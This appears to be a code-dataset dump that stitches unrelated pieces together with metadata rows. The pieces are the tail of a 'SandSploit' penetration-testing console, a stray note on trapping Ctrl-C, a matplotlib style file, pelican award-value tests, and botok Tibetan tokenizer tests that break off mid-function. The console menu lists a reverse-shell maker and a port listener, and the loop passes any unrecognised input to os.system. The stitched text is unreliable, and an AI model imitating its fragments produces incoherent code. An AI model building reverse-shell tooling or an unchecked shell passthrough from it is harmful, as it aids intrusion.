Command Description
======== ============
banner Change Banner
bash Run Bash Shell
list List of tools for each section
listener Sniffing Port
python               Interactive Shell (Debugging Purposes)
RSMaker Make Reverse Shell For Desktop Operating Systems
run Run Tools In modules
use Interact With Different Parts of Penetration Testing Tools
version Show version of SandSploit
exit Exit From SSF
''')
elif option == "version":
version()
elif option == "banner":
banner()
elif option == "RSMaker":
RSMaker()
elif option == "listener":
listener()
elif option == "exit":
sys.exit()
else:
os.system(option)
except EnvironmentError:
print ("\nUnknown Error......")
print ("Enter 'help' to show commands....")
termux_console()
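The SIGINT pattern both loops rely on — trap Ctrl-C so the prompt prints a hint instead of killing the REPL — can be sketched on its own (a hypothetical standalone snippet, not part of the framework):

```python
import signal

def on_interrupt(signum, frame):
    # Mirror of controlc_signal above: swallow Ctrl-C and hint at 'exit'.
    print("\nInterrupt: use the 'exit' command to quit")

# Installing the handler once is enough; every input() call after this point
# survives SIGINT instead of raising KeyboardInterrupt to the top level.
signal.signal(signal.SIGINT, on_interrupt)
```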
| 31.90566 | 98 | 0.425429 | 755 | 8,455 | 4.75894 | 0.219868 | 0.044531 | 0.013359 | 0.026719 | 0.84442 | 0.84442 | 0.84442 | 0.84442 | 0.84442 | 0.84442 | 0 | 0.009987 | 0.467061 | 8,455 | 264 | 99 | 32.026515 | 0.786951 | 0.044944 | 0 | 0.888889 | 0 | 0.004831 | 0.227875 | 0.022375 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.05314 | 0 | 0.096618 | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
65b91ff98a17de2d984aba71eb9e8f6694afc1ed | 420 | py | Python | demopy/notebooks/styles.py | omars-lab/demo-py | 08d656968ee330e607b100e58727b4503a5cde33 | [
"MIT"
] | null | null | null | demopy/notebooks/styles.py | omars-lab/demo-py | 08d656968ee330e607b100e58727b4503a5cde33 | [
"MIT"
] | null | null | null | demopy/notebooks/styles.py | omars-lab/demo-py | 08d656968ee330e607b100e58727b4503a5cde33 | [
"MIT"
] | null | null | null |
three_lines = (
[
dict(linewidth=5, color="lightgreen"),
dict(linewidth=3, linestyle="-.", color="gray"),
dict(linewidth=3, linestyle=":", color="blue")
]
)
four_lines = (
[
dict(linewidth=5, color="lightgreen"),
dict(linewidth=3, linestyle="-.", color="gray"),
dict(linewidth=3, linestyle=":", color="blue"),
dict(linewidth=5, color="red"),
]
)
| 23.333333 | 56 | 0.545238 | 43 | 420 | 5.27907 | 0.302326 | 0.400881 | 0.246696 | 0.405286 | 0.863436 | 0.863436 | 0.863436 | 0.863436 | 0.863436 | 0.863436 | 0 | 0.022152 | 0.247619 | 420 | 17 | 57 | 24.705882 | 0.696203 | 0 | 0 | 0.266667 | 0 | 0 | 0.107399 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
65c5bea0a1e6cfac3a8640f4966367cec255fec3 | 21,155 | py | Python | tests/dataset/distribution/test_awards_value.py | open-contracting/pelican-backend | dee9afb48f7485f94544bcfbb977558d638098cd | [
"BSD-3-Clause"
] | 1 | 2021-07-21T15:23:22.000Z | 2021-07-21T15:23:22.000Z | tests/dataset/distribution/test_awards_value.py | open-contracting/pelican-backend | dee9afb48f7485f94544bcfbb977558d638098cd | [
"BSD-3-Clause"
] | 40 | 2021-06-29T23:53:14.000Z | 2022-02-23T20:14:11.000Z | tests/dataset/distribution/test_awards_value.py | open-contracting/pelican-backend | dee9afb48f7485f94544bcfbb977558d638098cd | [
"BSD-3-Clause"
] | null | null | null | from dataset.distribution import value
from tools.currency_converter import bootstrap
bootstrap()
awards_value = value.ModuleType("awards.value")
item_unset1 = {"ocid": "1"}
item_unset2 = {"ocid": "2"}
def test_empty():
scope = {}
scope = awards_value.add_item(scope, item_unset1, 1)
scope = awards_value.add_item(scope, item_unset2, 2)
result = awards_value.get_result(scope)
    assert isinstance(result, dict)
assert result["result"] is None
assert result["value"] is None
    assert result["meta"] == {"reason": "insufficient amount of values (at least 100 required)"}
first = {
"ocid": "1",
"date": "2019-01-10T22:00:00+01:00",
"awards": [
{
"value": {
"amount": 10000000,
"currency": "EUR",
},
},
],
}
second = {
"ocid": "1",
"date": "2019-01-10T22:00:00+01:00",
"awards": [
{
"value": {
"amount": 1,
"currency": "USD",
},
},
],
}
def test_undefined():
scope = {}
scope = awards_value.add_item(scope, first, 1)
result = awards_value.get_result(scope)
    assert isinstance(result, dict)
assert result["result"] is None
assert result["value"] is None
    assert result["meta"] == {"reason": "insufficient amount of values (at least 100 required)"}
def test_failed():
scope = {}
scope = awards_value.add_item(scope, first, 1)
for i in range(2, 101):
scope = awards_value.add_item(scope, second, i)
result = awards_value.get_result(scope)
    assert isinstance(result, dict)
assert result["result"] is False
assert result["value"] == 0
assert result["meta"] == {
"counts": {
"0_1": 1,
"1_5": 4,
"20_50": 30,
"50_100": 50,
"5_20": 15,
},
"sums": {"0_1": 11507000, "1_5": 4, "20_50": 30, "50_100": 50, "5_20": 15},
"shares": {
"0_1": 11507000 / result["meta"]["sum"],
"1_5": 4 / result["meta"]["sum"],
"20_50": 30 / result["meta"]["sum"],
"50_100": 50 / result["meta"]["sum"],
"5_20": 15 / result["meta"]["sum"],
},
"examples": {
"0_1": [
{
"abs_amount": 11507000,
"item_id": 1,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 10000000, "currency": "EUR"},
}
],
"1_5": [
{
"abs_amount": 1,
"item_id": 2,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 3,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 4,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 5,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
"5_20": [
{
"abs_amount": 1,
"item_id": 6,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 7,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 8,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 9,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 10,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 11,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 12,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 13,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 14,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 15,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
"20_50": [
{
"abs_amount": 1,
"item_id": 21,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 22,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 23,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 24,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 25,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 26,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 27,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 28,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 29,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 30,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
"50_100": [
{
"abs_amount": 1,
"item_id": 51,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 52,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 53,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 54,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 55,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 56,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 57,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 58,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 59,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 60,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
},
"sum": 11507099,
}
def test_ok():
scope = {}
for i in range(100):
scope = awards_value.add_item(scope, second, i + 1)
result = awards_value.get_result(scope)
    assert isinstance(result, dict)
assert result["result"] is True
assert result["value"] == 100
assert result["meta"] == {
"counts": {
"0_1": 1,
"1_5": 4,
"5_20": 15,
"20_50": 30,
"50_100": 50,
},
"sums": {"0_1": 1, "1_5": 4, "5_20": 15, "20_50": 30, "50_100": 50},
"shares": {
"0_1": 1 / result["meta"]["sum"],
"1_5": 4 / result["meta"]["sum"],
"5_20": 15 / result["meta"]["sum"],
"20_50": 30 / result["meta"]["sum"],
"50_100": 50 / result["meta"]["sum"],
},
"examples": {
"0_1": [
{
"abs_amount": 1,
"item_id": 1,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
}
],
"1_5": [
{
"abs_amount": 1,
"item_id": 2,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 3,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 4,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 5,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
"5_20": [
{
"abs_amount": 1,
"item_id": 6,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 7,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 8,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 9,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 10,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 11,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 12,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 13,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 14,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 15,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
"20_50": [
{
"abs_amount": 1,
"item_id": 21,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 22,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 23,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 24,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 25,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 26,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 27,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 28,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 29,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 30,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
"50_100": [
{
"abs_amount": 1,
"item_id": 51,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 52,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 53,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 54,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 55,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 56,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 57,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 58,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 59,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
{
"abs_amount": 1,
"item_id": 60,
"ocid": "1",
"path": "awards[0].value",
"value": {"amount": 1, "currency": "USD"},
},
],
},
"sum": 100,
}
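The expected `counts` in the assertions above encode a percentile bucketing: the 100 ranked items fall into 0-1%, 1-5%, 5-20%, 20-50% and 50-100% bands, giving counts 1, 4, 15, 30 and 50, with `shares` being each band's sum divided by the total. The exact boundaries are an assumption inferred from the test data, not taken from the library's source; this sketch just reproduces the arithmetic.

```python
# Reproduce the band counts that test_failed/test_ok assert for n=100 items.
# Boundaries (1%, 5%, 20%, 50%, 100%) are inferred from the expected values.

def bucket_counts(n):
    bounds = [("0_1", 0.01), ("1_5", 0.05), ("5_20", 0.20),
              ("20_50", 0.50), ("50_100", 1.00)]
    counts = {}
    prev = 0
    for name, frac in bounds:
        edge = round(n * frac)   # cumulative item count up to this band
        counts[name] = edge - prev
        prev = edge
    return counts

counts = bucket_counts(100)
```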
| 33.526149 | 96 | 0.287355 | 1,588 | 21,155 | 3.695844 | 0.066121 | 0.165786 | 0.143125 | 0.238541 | 0.937127 | 0.928438 | 0.928438 | 0.916681 | 0.898279 | 0.873573 | 0 | 0.072294 | 0.54753 | 21,155 | 630 | 97 | 33.579365 | 0.540848 | 0 | 0 | 0.690554 | 0 | 0 | 0.23758 | 0.002364 | 0 | 0 | 0 | 0 | 0.026059 | 1 | 0.006515 | false | 0 | 0.003257 | 0 | 0.009772 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
65e981199822e894f271fb0a2ae5054059d1383c | 11,170 | py | Python | tests/tokenizers/test_bugs_missing_tokens.py | Esukhia/botok | 9009581cc290c800e7d93a405969e10a7c9d2f51 | [
"Apache-2.0"
] | 17 | 2019-10-19T15:29:52.000Z | 2022-03-01T19:43:15.000Z | tests/tokenizers/test_bugs_missing_tokens.py | drupchen/pybo | eac38e7c574e2e99a4f43ca641782d8616bb684d | [
"Apache-2.0"
] | 29 | 2019-09-01T21:33:15.000Z | 2022-01-11T08:57:50.000Z | tests/tokenizers/test_bugs_missing_tokens.py | Esukhia/botok | 9009581cc290c800e7d93a405969e10a7c9d2f51 | [
"Apache-2.0"
] | 8 | 2020-01-14T17:45:11.000Z | 2022-03-28T09:31:35.000Z | from botok import *
def test_missing_token1(wt):
input_str = "འཐུང་བུད་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["འཐུང་", "བུད་"]
def test_missing_token2(wt):
input_str = "ཨ་དྷྱིད་ཤུ་ཀ་ར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཨ་", "དྷྱིད་", "ཤུ་", "ཀ་ར་"]
def test_missing_token3(wt):
input_str = "ཀི་བི་ཏི་སྭཱ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཀི་", "བི་", "ཏི་", "སྭཱ་"]
def test_missing_token4(wt):
input_str = "ལང་ཏང་ཙེ་དང་བྱེ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ལང་", "ཏང་", "ཙེ་", "དང་", "བྱེ་"]
def test_missing_token5(wt):
input_str = "ད་མེད་བྷ་གར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ད་", "མེད་", "བྷ་", "གར་"]
def test_missing_token6(wt):
input_str = "རབ་བསྐུས་ནས།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["རབ་", "བསྐུས་", "ནས", "།"]
def test_missing_token7(wt):
input_str = "གདབ། །ཨོཾ་ན་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གདབ", "། །", "ཨོཾ་", "ན་"]
def test_missing_token8(wt):
input_str = "བི་སི་ནི་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བི་", "སི་", "ནི་"]
def test_missing_token9(wt):
input_str = "བསྐོལ། །རྡོ་རྗེ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྐོལ", "། །", "རྡོ་རྗེ་"]
def test_missing_token10(wt):
input_str = "བསྐུས་ཤིང་མཉེས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྐུས་", "ཤིང་", "མཉེས་"]
def test_missing_token11(wt):
input_str = "སྦོམ་ཞིང་ཆེ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["སྦོམ་", "ཞིང་", "ཆེ་"]
def test_missing_token12(wt):
input_str = "བྷ་ག་ཁ་ཆེ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བྷ་", "ག་", "ཁ་ཆེ་"]
def test_missing_token13(wt):
input_str = "།ཨོཾ་གི་རི་ཧི་རི་ཙི་རི། །ཨཱ་ཨཱ་ཤུ་མ་ཤ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == [
"།",
"ཨོཾ་",
"གི་",
"རི་",
"ཧི་",
"རི་",
"ཙི་",
"རི",
"། །",
"ཨཱ་",
"ཨཱ་",
"ཤུ་",
"མ་",
"ཤ་",
]
def test_missing_token14(wt):
input_str = "བཟླས་བྱས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བཟླས་", "བྱས་"]
def test_missing_token15(wt):
input_str = "བསྣམས། །རྩི་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྣམས", "། །", "རྩི་"]
def test_missing_token16(wt):
input_str = "ནཱ་ཤ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ནཱ་", "ཤ་"]
def test_missing_token17(wt):
input_str = "གནོས་སྨྱོ་བྱེད་བརྗེད་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གནོས་", "སྨྱོ་", "བྱེད་", "བརྗེད་"]
def test_missing_token18(wt):
input_str = "གདོད་ཟིན་པ"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གདོད་", "ཟིན་པ"]
def test_missing_token19(wt):
input_str = "བསྲེས་དམར་ནག་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྲེས་", "དམར་ནག་"]
def test_missing_token20(wt):
input_str = "བརྗེ་ཞིང་བསྐྱར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བརྗེ་", "ཞིང་", "བསྐྱར་"]
def test_missing_token21(wt):
input_str = "འཆང་མའི།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["འཆང་", "མའི", "།"]
def test_missing_token22(wt):
input_str = "དམོད་གཟུག་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["དམོད་", "གཟུག་"]
def test_missing_token23(wt):
input_str = "བཤགས་ན་བུ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བཤགས་", "ན་", "བུ་"]
def test_missing_token24(wt):
input_str = "མཐོལ་མགོ་ལ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["མཐོལ་", "མགོ་", "ལ་"]
def test_missing_token25(wt):
input_str = "ཧུ་ཧཾ།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཧུ་", "ཧཾ", "།"]
def test_missing_token26(wt):
input_str = "སྲི་མོ་བཛྲ་ནོ་ཏི་སྟ་ཀཱི་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == [
"སྲི་",
"མོ་",
"བཛྲ་",
"ནོ་",
"ཏི་",
"སྟ་",
"ཀཱི་",
]
def test_missing_token27(wt):
input_str = "གུམ་དང་།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གུམ་", "དང་", "།"]
def test_missing_token28(wt):
input_str = "ཡོལ་གྱིས"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཡོལ་", "གྱིས"]
def test_missing_token29(wt):
input_str = "སྐུད་སྣ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["སྐུད་", "སྣ་"]
def test_missing_token30(wt):
input_str = "བཀྲ་མ།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བཀྲ་", "མ", "།"]
def test_missing_token31(wt):
input_str = "གདོད་པར་བྱ"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གདོད་", "པར་", "བྱ"]
def test_missing_token32(wt):
input_str = "བསྒྲིབས་ཡོངས་སུ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྒྲིབས་", "ཡོངས་སུ་"]
def test_missing_token33(wt):
input_str = "དྲངས་ནས།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["དྲངས་", "ནས", "།"]
def test_missing_token34(wt):
input_str = "རཱུ་ཏྲ་ཀྵ་གནས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["རཱུ་", "ཏྲ་", "ཀྵ་", "གནས་"]
def test_missing_token35(wt):
input_str = "ལྡང་པ་ན།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ལྡང་པ་", "ན", "།"]
def test_missing_token36(wt):
input_str = "བསྲུབས་བྱས་པས། །ལྟེ་ལྐོག་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྲུབས་", "བྱས་པས", "། །", "ལྟེ་", "ལྐོག་"]
def test_missing_token37(wt):
input_str = "བསྟུན་ལ་ཉམས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྟུན་", "ལ་", "ཉམས་"]
def test_missing_token38(wt):
input_str = "ཥ་ཡིག་རྣམ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཥ་", "ཡིག་", "རྣམ་"]
def test_missing_token39(wt):
input_str = "འཛོམ། །རྣོ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["འཛོམ", "། །", "རྣོ་"]
def test_missing_token40(wt):
input_str = "པྲི་ཡིག་དམར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["པྲི་", "ཡིག་", "དམར་"]
def test_missing_token41(wt):
input_str = "གཏུམ་བྱེད་དང་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གཏུམ་", "བྱེད་", "དང་"]
def test_missing_token42(wt):
input_str = "ཞིབ་བས་སྦལ།"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཞིབ་", "བས་", "སྦལ", "།"]
def test_missing_token43(wt):
input_str = "གཅོད་འཁོར་ལོ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["གཅོད་", "འཁོར་ལོ་"]
def test_missing_token44(wt):
input_str = "བཏུལ་མཚམས་བཅད་པ"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བཏུལ་", "མཚམས་", "བཅད་པ"]
def test_missing_token45(wt):
input_str = "ཞལ་བྷ་ག་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ཞལ་", "བྷ་", "ག་"]
def test_missing_token46(wt):
input_str = "བསྐུར་ལས་ཀྱི་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བསྐུར་", "ལས་", "ཀྱི་"]
def test_missing_token47(wt):
input_str = "འཁོས་དུ། །ཆེ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["འཁོས་", "དུ", "། །", "ཆེ་"]
def test_missing_token48(wt):
input_str = "ནུ་ཧེ་རུ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ནུ་", "ཧེ་", "རུ་"]
def test_missing_token49(wt):
input_str = "བརྩེགས་རྣམ་པར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བརྩེགས་", "རྣམ་པར་"]
def test_missing_token50(wt):
input_str = "བྷ་གར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བྷ་", "གར་"]
def test_missing_token51(wt):
input_str = "ནུ་ཡེ་ཤེས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["ནུ་", "ཡེ་ཤེས་"]
def test_missing_token52(wt):
input_str = "བརྩེགས་ངེས་པ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བརྩེགས་", "ངེས་པ་"]
def test_missing_token53(wt):
input_str = "བཟླས་བསྐུལ་གསུང་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བཟླས་", "བསྐུལ་", "གསུང་"]
def test_missing_token54(wt):
input_str = "བྷ་གར་འཁྱིལ། །ཨོཾ་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བྷ་", "གར་", "འཁྱིལ", "། །", "ཨོཾ་"]
def test_missing_token55(wt):
input_str = "བྷ་གར་སྦྱོར་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བྷ་", "གར་", "སྦྱོར་"]
def test_missing_token56(wt):
input_str = "བརྒྱུད་སྐུ་གདུང་"
tokens = wt.tokenize(input_str, split_affixes=False)
